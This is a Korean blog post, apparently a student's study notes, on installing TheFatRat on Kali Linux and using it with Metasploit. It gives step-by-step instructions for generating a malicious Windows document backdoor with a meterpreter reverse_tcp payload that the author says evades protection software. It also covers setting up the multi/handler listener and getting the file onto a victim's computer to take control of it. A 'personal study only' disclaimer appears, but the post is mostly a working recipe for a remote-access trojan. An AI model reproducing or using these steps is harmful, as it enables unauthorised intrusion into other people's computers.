Metasploit-framework는 보안관련 프로그램 입니다.
이 프로그램을 사용하여 여러 보안 exploit framework를 실행 해 볼 수 있습니다.
Metasploit-framework를 기반으로 하여 운영되는 TheFatRat을 실행해 볼려고 합니다.
TheFatRat은 msfvenom (metasploit framework 중 일부)를 사용하여 백도어(시스템에 비인가 접근 시도 프로그램)을 생성하는 쉬운 프로그램 입니다. 이 프로그램은 뭴웨어(악성 소프트웨어)를 컴파일 한다음 컴파일 된 프로그램을 windows, android, mac에서 실행할 수 있습니다. 이 프로그램으로 만든 뭴웨어는 소프트웨어 보호를 우회 할 수 있습니다.
이 프로그램을 설치하고 실행해 보도록 하겠습니다.
이때 주의 할 것은 프로그램이 metasploit-framework말고도 다른 프로그램을 같이 설치해야 하는데
일반 ubuntu 같은 linux를 사용할 경우 설치해야할 프로그램이 정말 많아지므로
보안 관련 프로그램이 미리 많이 설치 되어 있는 kali linux를 사용하여 TheFatRat을 실행해 보도록 하겠습니다.
1. TheFatRat설치
1) github에 들어가서 주소를 복사합니다.
https://github.com/Screetsec/TheFatRat
Screetsec/TheFatRat
Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and th...
github.com
2) kali linux에 들어가서 터미널을 열고 아래에 코드를 입력합니다.
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh
3) 코드를 입력하면 자동으로 TheFatRat과 그에 필요한 다른 프로그램들을 설치합니다.
4) 설치가 끝난 후 TheFatRat repository에서 fatrat을 입력합니다.
5) 아래과 같이 프로그램이 실행 됩니다.
2. TheFatRat 활용
이 아래의 포스트는 개인적인 공부용으로 사용되어야 하며 다른 곳에 악용 해서는 안됩니다.
저는 windows doucment 뭴 웨어 문서를 만들어서 그것을 다른 컴퓨터에 전달하여 그것의 사용자가 실행시키면 제가 그 사용자의 컴퓨터를 사용할 수 있는 프로그램을 만들려고 합니다.
프로그램을 만들기 전에 기본적으로 알아두어야 할 것이 있습니다.
-- 1. LHOST : 프로그램이 실행되면 조종할 수 있게 되는 OS의 IP주소
-- 2. LPORT : 프로그램이 실행되어질때 연결해주는 통로
1) TheFatRat을 실행하여서 7번을 입력합니다.
=> 7번을 입력하는 이유는 microsoft의 backdoor를 만드는 프로그램이기 때문
2)우리는 windows에서 실행되는 backdoor를 만들 것이기 때문에 2번을 선택합니다.
3)LHOST IP를 입력하고 LPORT(임의)도 입력하여 줍니다(시스템 위에 ip4 ip가 띄워져 있습니다.)
4)Enter와 custom을 n으로 입력합니다.
5)payload(공격 프로그램)를 선택하는데 meterpreter를 사용하여 가장 자주 쓰는 3번을 선택합니다.
reverse_tcp는 희생자가 공격자에게 통신 요청을 하도록 만드는 payload입니다. 공격자 쪽에서는 연결을 수신할 수 있는 포트가 열려있어야 합니다.
6) 실행이 끝나면 backdoor(microsoft documet)파일이 저장된 위치가 나옵니다.
7) metsploit을 실행시킵니다.
8) 아래의 코드를 실행시킵니다. 그 이유는 handler로 backdoor를 실행시키는 것입니다. 그리고
payload는 backdoor를 생성할때 설정하였던 meterpreter/reversere_tcp를 사용합니다.
exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <port number>
exploit9) 이렇게 하고 나서 저장해둔 backdoor를 공격 받을 OS에 옮기고 backdoor를 실행시킵니다.
10) 그러면 실행이 됩니다.
=> 실행시 터미널에서 공격받은 OS의 문서나 프로그램을 실행 시킬 수 있습니다.
이 프로그램을 실행시켜 보면서 일반적인 metasploit-framework로 backdoor를 만드는 것보다 훨씬 수월하다는 것을 알았습니다. 프로그램에는 여러가지 틈이 있고 그 틈으로 바이러스를 침투시켜 다른 컴퓨터를 장악 할 수 있다는 것을 직접 느끼게 되었습니다.
TheFatRat을 설치할때도, metasploit-framework를 설치할때에도 모두 이 프로그램을 악용하지 말하는 경고가 나왔습니다. 쉽게 사용하고 쉽게 만들 수 있는 만큼 신중히 다루어야 하는 프로그램들이라는 것을 알았습니다.
참조 https://www.youtube.com/watch?v=lglOXojT84M&t
'기타 > 오픈소스웨어 파헤치기' 카테고리의 다른 글
| 소프트웨어 분석 - 3. 경쟁 제품과의 장/단점 비교 (Instagram) (0) | 2020.04.25 |
|---|---|
| 소프트웨어 분석 -2. 소프트웨어 특징 (Instagram) (0) | 2020.04.25 |
| 소프트웨어 분석 -1. 소프트웨어 선택 배경 (0) | 2020.04.25 |
| Metasploit-framework 설치하기 (0) | 2020.03.15 |
| Metasploit-framework이란 (0) | 2020.03.14 |
